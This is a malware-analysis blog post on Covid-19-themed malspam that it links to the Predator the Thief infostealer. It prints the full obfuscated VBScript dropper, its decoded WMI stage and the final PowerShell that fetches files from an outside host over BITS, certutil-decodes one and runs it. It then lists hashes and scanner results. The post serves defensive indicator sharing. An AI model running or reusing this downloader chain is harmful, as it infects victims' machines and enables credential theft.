2020-03-20 More Predator The Thief Malspam – Covid-19 Themed

Meta
=====

From: *.xyz
Subject: Various Covid-19
Attachment: covidXX_form.zip

This looks to be related to Predator the Thief malspam based on the final script that gets executed which looks very close to the sample that I posted about over here. The zip file and VBScript can be found in my Github repo here.

Here is the code in the actual VBScript.

Function l(a): 
With CreateObject("Msx"+"ml2.DOMD"+"ocument").CreateElement("aux"): .DataType = "bin.base64": .Text = a: l = r(.NodeTypedValue): 
End With: 
End Function 
Function r(b): 
With CreateObject("ADODB"+".Stream"): .Type = 1: .Open: .Write b: .Position = 0: .Type = 2: .CharSet = "utf-8": r = .ReadText: .Close: 
End With: 
End function 
Execute(l("U2V0IHRlYXMgPSBHZXRPYmplY3QoIndpbm1nbXRzOlxcLlxyb290XGNpbXYyOldpbjMyX1Byb2Nlc3NTdGFydHVwIikKdGVhcy5TaG93V2luZG93ID0gMApIZWFzSmllYSA9IEdldE9iamVjdCgid2lubWdtdHM6XFwuXHJvb3RcY2ltdjI6V2luMzJfUHJvY2VzcyIpLkNyZWF0ZShTdHJSZXZlcnNlKCI9PUFBM0F3YUFVR0E0QVFhQUFDQTBCd2NBa0dBTUJBZEE0R0FsQlFiQVVIQW5CZ2NBRUVBdEFBSUFrR0F0QndOQUVEQXlCQUlBTUhBekJRWkFNR0F2QmdjQUFGQXRBQWRBSUhBaEJBZEFNRkFnQUFJQXNEQTNBd2FBVUdBNEFRYUFBQ0EwQmdlQVVHQXJCZ2FBQUNBbEJBWkE4R0FqQlFaQVFHQXRBQUlBd0dBcEJBZEFVSEEwQmdjQVVHQWpCQUlBc0RBaUFBVUEwRUFGQkFWQW9EQTJCZ2JBVUdBa0FnSUFBQ0FvQkFkQUVHQVFCUUxBQUNBdUJ3YkFrR0EwQlFZQU1HQXZCQVRBMENBMEJRWkFNRkFnQXdPQUlDQXRCd2JBTUdBdUFRZUE4RUFaQkFVQWtHQWNCQVVBMEVBRkJBVkFvREEyQmdiQVVHQWtBZ0lBd0NBaUFBZEFvSEFsQndhQW9HQWNCQVVBMEVBRkJBVkFvREEyQmdiQVVHQWtBZ0lBd0NBaUFRYkE4R0FqQmdMQWtHQXRCd05BRURBeUJBWEFBRkFOQlFSQVFGQTZBZ2RBNEdBbEJBSkFJQ0FnQWdiQThHQXBCQWRBRUdBdUJRYUFRSEF6QlFaQVFFQXRBQUlBUUhBaEJBWkE0Q0E1QndUQWtGQVFCUWFBOENBbEJBZEFrR0F6QmdZQVVHQTNCZ0xBRURBM0J3YkFnR0F6QndMQThDQTZBQWNBUUhBMEJBYUF3Q0EwQlFZQVFHQXVBQVRBRUdBNUJRWkFnRUF2QVFaQVFIQXBCd2NBSUdBbEJ3ZEE0Q0F4QXdkQThHQW9Cd2NBOENBdkFnT0FBSEEwQkFkQWdHQXNBQWRBRUdBa0JnTEFNRkFCQmdjQVVHQVBCd0xBVUdBMEJRYUFNSEFpQlFaQWNIQXVBUU1BY0hBdkJBYUFNSEF2QXdMQW9EQXdCQWRBUUhBb0JBSUFVR0FqQmdjQVVIQXZCd1VBMENBZ0FnY0FVR0FtQndjQTRHQWhCZ2NBUUZBekJBZEFrR0FDQlFMQVFIQXlCUVlBUUhBVEJBSUFzREF5QlFaQVlHQXpCZ2JBRUdBeUJBVkFNSEEwQlFhQUlFQWdBUVpBd0dBMUJBWkE4R0FOQlFMQVFIQXlCd2JBQUhBdEJRUyBlLSBsbGVoc3Jld29wIikgLCBOdWxsLCB0ZWFzLCBHZWF1ZCAp"))

And then with it decoded (first pass).

Set teas = GetObject("winmgmts:\\.\root\cimv2:Win32_ProcessStartup")
teas.ShowWindow = 0
HeasJiea = GetObject("winmgmts:\\.\root\cimv2:Win32_Process").Create(StrReverse("==AA3AwaAUGA4AQaAACA0BwcAkGAMBAdA4GAlBQbAUHAnBgcAEEAtAAIAkGAtBwNAEDAyBAIAMHAzBQZAMGAvBgcAAFAtAAdAIHAhBAdAMFAgAAIAsDA3AwaAUGA4AQaAACA0BgeAUGArBgaAACAlBAZA8GAjBQZAQGAtAAIAwGApBAdAUHA0BgcAUGAjBAIAsDAiAAUA0EAFBAVAoDA2BgbAUGAkAgIAACAoBAdAEGAQBQLAACAuBwbAkGA0BQYAMGAvBATA0CA0BQZAMFAgAwOAICAtBwbAMGAuAQeA8EAZBAUAkGAcBAUA0EAFBAVAoDA2BgbAUGAkAgIAwCAiAAdAoHAlBwaAoGAcBAUA0EAFBAVAoDA2BgbAUGAkAgIAwCAiAQbA8GAjBgLAkGAtBwNAEDAyBAXAAFANBQRAQFA6AgdA4GAlBAJAICAgAgbA8GApBAdAEGAuBQaAQHAzBQZAQEAtAAIAQHAhBAZA4CA5BwTAkFAQBQaA8CAlBAdAkGAzBgYAUGA3BgLAEDA3BwbAgGAzBwLA8CA6AAcAQHA0BAaAwCA0BQYAQGAuAATAEGA5BQZAgEAvAQZAQHApBwcAIGAlBwdA4CAxAwdA8GAoBwcA8CAvAgOAAHA0BAdAgGAsAAdAEGAkBgLAMFABBgcAUGAPBwLAUGA0BQaAMHAiBQZAcHAuAQMAcHAvBAaAMHAvAwLAoDAwBAdAQHAoBAIAUGAjBgcAUHAvBwUA0CAgAgcAUGAmBwcA4GAhBgcAQFAzBAdAkGACBQLAQHAyBQYAQHATBAIAsDAyBQZAYGAzBgbAEGAyBAVAMHA0BQaAIEAgAQZAwGA1BAZA8GANBQLAQHAyBwbAAHAtBQS e- llehsrewop") , Null, teas, Geaud )

Which leads to this final code being runned on the system.

Import-Module BitsTransfer;
Start-BitsTransfer -Source http://show1.website/OerAS.dat,http://show1.website/HeyaL.dat,http://show1.website/iPYOy.dat -Destination "$env:TEMP\r17mi.com","$env:TEMP\jkezt","$env:TEMP\iPYOy.com";
Set-Location -Path "$env:TEMP";
certutil -decode jkezt i8ek7;
Start-Process r17mi -ArgumentList i8ek7

Reference
==========

http://urlhaus.abuse.ch/browse.php?search=show1.website
http://malshare.com/search.php?query=d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c
http://bazaar.abuse.ch/browse.php?search=d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c
http://app.any.run/tasks/8f771d9c-355f-4262-bac0-0a1927f52222/
http://gchq.github.io/CyberChef/#recipe=Reverse(‘Character’)From_Base64(‘A-Za-z0-9%2B/%3D’,true)Remove_null_bytes()&input=PT1BQTNBd2FBVUdBNEFRYUFBQ0EwQndjQWtHQU1CQWRBNEdBbEJRYkFVSEFuQmdjQUVFQXRBQUlBa0dBdEJ3TkFFREF5QkFJQU1IQXpCUVpBTUdBdkJnY0FBRkF0QUFkQUlIQWhCQWRBTUZBZ0FBSUFzREEzQXdhQVVHQTRBUWFBQUNBMEJnZUFVR0FyQmdhQUFDQWxCQVpBOEdBakJRWkFRR0F0QUFJQXdHQXBCQWRBVUhBMEJnY0FVR0FqQkFJQXNEQWlBQVVBMEVBRkJBVkFvREEyQmdiQVVHQWtBZ0lBQUNBb0JBZEFFR0FRQlFMQUFDQXVCd2JBa0dBMEJRWUFNR0F2QkFUQTBDQTBCUVpBTUZBZ0F3T0FJQ0F0QndiQU1HQXVBUWVBOEVBWkJBVUFrR0FjQkFVQTBFQUZCQVZBb0RBMkJnYkFVR0FrQWdJQXdDQWlBQWRBb0hBbEJ3YUFvR0FjQkFVQTBFQUZCQVZBb0RBMkJnYkFVR0FrQWdJQXdDQWlBUWJBOEdBakJnTEFrR0F0QndOQUVEQXlCQVhBQUZBTkJRUkFRRkE2QWdkQTRHQWxCQUpBSUNBZ0FnYkE4R0FwQkFkQUVHQXVCUWFBUUhBekJRWkFRRUF0QUFJQVFIQWhCQVpBNENBNUJ3VEFrRkFRQlFhQThDQWxCQWRBa0dBekJnWUFVR0EzQmdMQUVEQTNCd2JBZ0dBekJ3TEE4Q0E2QUFjQVFIQTBCQWFBd0NBMEJRWUFRR0F1QUFUQUVHQTVCUVpBZ0VBdkFRWkFRSEFwQndjQUlHQWxCd2RBNENBeEF3ZEE4R0FvQndjQThDQXZBZ09BQUhBMEJBZEFnR0FzQUFkQUVHQWtCZ0xBTUZBQkJnY0FVR0FQQndMQVVHQTBCUWFBTUhBaUJRWkFjSEF1QVFNQWNIQXZCQWFBTUhBdkF3TEFvREF3QkFkQVFIQW9CQUlBVUdBakJnY0FVSEF2QndVQTBDQWdBZ2NBVUdBbUJ3Y0E0R0FoQmdjQVFGQXpCQWRBa0dBQ0JRTEFRSEF5QlFZQVFIQVRCQUlBc0RBeUJRWkFZR0F6QmdiQUVHQXlCQVZBTUhBMEJRYUFJRUFnQVFaQXdHQTFCQVpBOEdBTkJRTEFRSEF5QndiQUFIQXRCUVM

Artifacts
==========

Email hashes
————-
182a2cc132f77bacda747c8b36ae82d807e5a3cee01c734deb29f2598b992918 —— ahpwzh909165720504.eml
b23c073099a90b2d42c12c05ed86b09fc8ca563b044a411db55a066ce717cb69 —— amenfj107683720503.eml
8758c35198dd93fcdd5558e4b02cf42b00d7db7a89b29696ff43e9b5a652b452 —— aqjhih486051720509.eml
727872132b70153b261a32a32549ab3015b2074a880d6c80910d61750f11b009 —— bectoa324586720508.eml
2982d7c460629631ae2145580140d26402efc27baa75efb07e63aed50a11607a —— bgnlhx068677720507.eml
fa9961b389fbc4bab3554d5ba3e5f3b876504e691209d6391d5c8d52f698089f —— bwshti965590720502.eml
87da0ff125413aa5dac4b237e8442c871e4e9020a846f09a6d2739fe3b35042c —— cilevz072352720503.eml
1bff3d0e786f66cd47a4480e25a683ca7eec18138c0d2254d8f9c88138e156b3 —— ckvpia223121720509.eml
312630c0affd465e3ce6b54da78685dd637494eca9240f9693c2c17a764ce5db —— cqihll893721720502.eml
9a732aaacbce30c3a65048c34a11b1e2869a8d7515949145cfbb4360ebd0e4e2 —— dljwob279691720509.eml
a924cc0373bc5f5ed01c02cb8929c2747755fe63b5a86913bcdf7e477630a74e —— dvfqtv681383720509.eml
cbc9322e6da2a67a70a1c27ad321e1cbc42df5af811350f647eba164b50244de —— dwabmh152144720507.eml
9408662823842ed16a1e6f6c622382784d436c61907c284458a3a5c88d02da31 —— emoivy091449720505.eml
ac9962a6b532edb050d319197087ae491d969eb570e5b26d19ba06938be7d11d —— faphdx143744720503.eml
f80611ed48c8f7236ce774d93f932a44f7d483daa545e72463ecf541a31f9dd6 —— gqucfs999396720505.eml
fde4a39ec21c2511cb79fc58049bfeb4f3404a9bf96bcb0afa7de758ee38af3a —— gsckqv038756720508.eml
9b164b3ef7fa34d525b30da95f1ea8cd13aa350383619f3f7c261abebdccc5ad —— helhmv035088720506.eml
4168564de21589597ff90de1ed9ac8f9b071515b35873c59b618b3ab2ddcbcc8 —— ifarbb447866720509.eml
5a2a46ef8ca3c0e6920caa0e8dce50e9f479cd821ed0b1cc52c0e31fbc4db4b4 —— ivdinf970396720504.eml
fc872d847b1ee53d9974ba86114f3cd5c2ace0304d5824da2d936dfadc52f0d3 —— kginyn613097720509.eml
be07c28cb8489517031b6608cf1e6ae96f730fe3fca53f372a60a0cf609f61a1 —— khskmd054398720505.eml
2f8f21ca9d9a91f5bb0d8d520a18d15238c30c23dcf19da0870c66018ab9b089 —— lewyfh359586720509.eml
59a3448589fd10566cd3ff7b99206b0ae3bc5508636d971f28bca5f89de24203 —— llnbng258644720508.eml
93047698e9f054913f24c7ff17a2a46eb2a420d1e4b2df66f8128a1c9b624119 —— lonbxj929511720502.eml
b077fdd83c940f1ee0d90c290cc45ba669f6ce5444d11bbaf5838487e4a8c6f3 —— lzfzyu646540720509.eml
18b2757cb8bc85d67612426561e0e421bb9cac6dc3537cc186c9c005d68e1a00 —— miwgbo082364720506.eml
f3ff0b220ecee663b4f04ab3d763c4d2c7f03ae2c7d17dd19ce19ce17740b5ca —— mqefkj109159720507.eml
1a14439b54ab74d5de7a7dc336d27fc820c660934a4d2a634d155d54d2262eab —— nghtpw022081720507.eml
3d27775288fae409d1a6c3d63712c6990d51c2eb9368c8e36394fbc0e43f8f56 —— nnlmhy001515720503.eml
5fb4a5cb963984a3fbc7e8f084189e1da9ead15097b0d0d436a026c035452584 —— nnynjh213509720506.eml
3af0739f1e2707d2fb763de2cb81c66a666fb230ec654c94fe57d15438cde0c4 —— onctnr950551720507.eml
98a967858c2c96dd78df404220e6501ab7203ccbdba1da8c0c57c7ac982f2cdc —— ooxcnt317569720509.eml
ae4a016ce43b45fffc6c56abf5ae7711ecec60d025862ac75c1f02e0ed7393e2 —— oskvef181932720503.eml
313a15dc929ca1f01339e1cfd7d08454d138ee124862755a63abcf207b20bb43 —— qlryhj128390720505.eml
342d7aa503394d38922eec3099266e92b3b15f02d1099d4e7c7b23728e30b4b1 —— raliuz217617720503.eml
239322bfe9df50e2bb4c82e02be8937ecae1f4f2ba7376d167340ecca3a53af3 —— rffkmr935458720505.eml
b0d15c2a44d749efce5022bcb437bc3bb9efc79ac2bab099c75a8b9b2125b07a —— rghcly404847720509.eml
8e2d0a24adb8e8b3077bf75aed01b897cc0b317d50aaf927772fb22c18b1ebea —— txbsnn206432720508.eml
ee079262af4424f01b5624815301e16bcf1083ec88874a06a45a945e86b408b3 —— uudqvw036913720503.eml
1ab01426f338f727814d3fb20a8dcfbde40da580a5b060fc8e840288573159c4 —— vdhaur167510720505.eml
5a474c4ae2715a300c6a4f88a5be448d9ce16931d2cd52f8ba47fd66155fd2f1 —— wmfgiu574933720509.eml
19abaf70f1f6cbb424b9e100616097f96d40a6462eeec0358e9518f5c4a9a1ef —— wumwvg372999720508.eml
baa6d1cb5fdd13cfbccf3a533a5f5c9f4148d9a3e65cc6248109f78b4403b226 —— xuxuqj527923720509.eml
eadee2ef4f229e1a201d1852f1ed034642dff680715c314d4583005b90c61f0b —— ymgomi173864720506.eml
7f34f1ae28926fd7165defd06efad7e3b3d9c47807858750afe46efaafc7dfeb —— ynjkty089546720508.eml
a249e898c675690e11d71b90292cbec89fe6fa1d75257ad4b8e6dd60fd021d24 —— zdjppk015535720505.eml
0e734d7344ca7be03122a0e6f826dcfc77fd8cf2ddd673b2fd4b3c7c3a325a1c —— zntqsb424056720508.eml

File hashes
————

5fc61f88a7f47073c24ddf33237846bba8d8a27124116e23c362bc35e77ca0f5 —— covid21_form.zip
f8620dd6b8fc37fba432728341961a4441ed929ff16cb3f70b80244d70768d7f —— covid22_form.zip
0dae5e8e259576a05d87faec63e382f21dc2f2888c82a05b763aa10585bbdda1 —— covid23_form.zip
394f653cc7ef4e3d1cc0217bc940b1efabcba7d22662c0d298536f8402a54b58 —— covid24_form.zip
14dcc393d3fee5971220634f291bba5776614b9c39c6c6e8da782e79766f8855 —— covid26_form.zip
754b8ece7f7f28b1170ca143e45c133f5977add875a2310c1da62b7c884ebbb2 —— covid27_form.zip
125575ead5f5ed3c524c7012b89da3741cc0b365e6214ae501a2d056ea1b8d9b —— covid28_form.zip
3f0ce0501a74811d8ef6f314d4bfdf34d8204ecc90b296ca19c4a5a20ab8f5d0 —— covid30_form.zip
436672d96a9c9f1216de032cbf34d0a1b1eb86e3f1e903631d6df3994a460566 —— covid31_form.zip
d9db96ab59eaab31009d5facc359e3bc6e915cd6558e339cd94b6c407b3934be —— covid32_form.zip
1ebfff4292722a5e785adfb5f86f8c99302f915e6a40dd166de3162ad252bc58 —— covid34_form.zip
ccc9b3ce71b082c0e81dc8acb8ddbb8d4aa66dfebf3377ca3f2d5d0e47007b3b —— covid35_form.zip
273ec7da73a29a99e0e28142e3d9fe80e297a06fe18e32a6537913453bfd1652 —— covid38_form.zip
f9201a2787ec144b0638e22744a074ef168084f94123d1cd8f25f42ef10b7a57 —— covid39_form.zip
bc27f858d9ad61c36b95a232e506476de8ebdd85eb712bcbf6b045fbb1c340eb —— covid41_form.zip
e9fb57f7f5286e07ef704bac0ddeb098542ee3229a03220a0b7677daf177bf7e —— covid42_form.zip
8fac412bdd6401a0f1d178a023e3c2d128d35cfec500ef194b2f4872b561a6b7 —— covid43_form.zip
a2a062cdfad00e93b8fd83887d1b12f446312aa3f990bc43e3addc8254983f34 —— covid44_form.zip
dfdbe5ff6d5ea17ff3ed0b521a0ea6c4b2c95e4702ba4725ff006d507cfc3504 —— covid45_form.zip
e5187acd91e48b18e68ef63093d0368c3a6f24527160d42089071edf5e69139d —— covid46_form.zip
03a8a1e0c5e0ecf7c51ca10ffe1bf1428606df7b8c3e4ab6df313f074ef992e9 —— covid47_form.zip
5400e9d4de9cefac60ac1b05608e53ee14a1579f1835762cf56f01c9e925abbc —— covid49_form.zip
a29afb545040a7c5f67bad6e03614a5e346c99fd2d851285fc5c2e2f80c380ff —— covid50_form.zip
b374c87ae852aa0443eb541f7d4ef4017c4238b10155381b88bb05016caab445 —— covid51_form.zip
15f3dae3f977165267156bbd90fcb9e1dd8dc92ae5247b5621b3ce0439b89d1e —— covid53_form.zip

d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid21_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid22_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid23_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid24_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid26_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid27_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid28_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid30_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid31_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid32_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid34_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid35_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid38_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid39_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid41_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid42_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid43_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid44_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid45_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid46_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid47_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid49_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid50_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid51_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid53_form.vbs

Machinae results
—————–

File names: covid21_form.zip, covid21_form.vbs
[.] Requesting http://www.virustotal.com/vtapi/v2/file/report?apikey=XXX&resource=5fc61f88a7f47073c24ddf33237846bba8d8a27124116e23c362bc35e77ca0f5 (GET)
[.] Requesting http://www.virustotal.com/vtapi/v2/file/report?apikey=XXX&resource=d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c (GET)
********************************************************************************
* Information for 5fc61f88a7f47073c24ddf33237846bba8d8a27124116e23c362bc35e77ca0f5
* Observable type: hash.sha256 (Auto-detected: True)
********************************************************************************
Not seeing what you expect? Likely not a valid site. Try running with –list-sites

[+] VirusTotal File Report Results
[-] Date submitted: 2020-03-20 17:30:07
[-] Detected engines: 2
[-] Total engines: 63
[-] Scans: (‘Arcabit’, ‘HEUR[.]Arch[.]Script.A’)
[-] Scans: (‘Qihoo-360’, ‘virus[.]vbs[.]qexvmc.1085’)
********************************************************************************
* Information for d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c
* Observable type: hash.sha256 (Auto-detected: True)
********************************************************************************
Not seeing what you expect? Likely not a valid site. Try running with –list-sites

[+] VirusTotal File Report Results
[-] Date submitted: 2020-03-20 17:22:46
[-] Detected engines: 3
[-] Total engines: 59
[-] Scans: (‘Microsoft’, ‘TrojanDownloader:VBS/Nemucod!MTB’)
[-] Scans: (‘ZoneAlarm’, ‘UDS:DangerousObject[.]Multi[.]Generic’)
[-] Scans: (‘Qihoo-360’, ‘virus[.]vbs[.]qexvmc.1085’)

Munin results
————–

1 / 2 > Suspicious
HASH: d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c COMMENT: covid21_form.vbs
VIRUS: Microsoft: TrojanDownloader:VBS/Nemucod!MTB
TYPE: Text SIZE: 1.77 KB FILENAMES: covid22_form.vbs, covid22_form.vbs
FIRST: 2020-03-20 14:23:16 LAST: 2020-03-20 17:30:04 SUBMISSIONS: 1 REPUTATION: 0
COMMENTS: 0 USERS: – TAGS: TEXT
RESULT: 3 / 58
[!] Sample on ANY.RUN URL: http://any.run/report/d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c

2 / 2 > Suspicious
HASH: 5fc61f88a7f47073c24ddf33237846bba8d8a27124116e23c362bc35e77ca0f5 COMMENT: covid21_form.zip
TYPE: ZIP SIZE: 1.22 KB FILENAMES: covid21_form.zip, covid21_form.zip
FIRST: 2020-03-20 14:11:51 LAST: 2020-03-20 17:30:07 SUBMISSIONS: 1 REPUTATION: 0
COMMENTS: 0 USERS: – TAGS: ZIP
RESULT: 2 / 63

Leave a Reply

Your email address will not be published. Required fields are marked *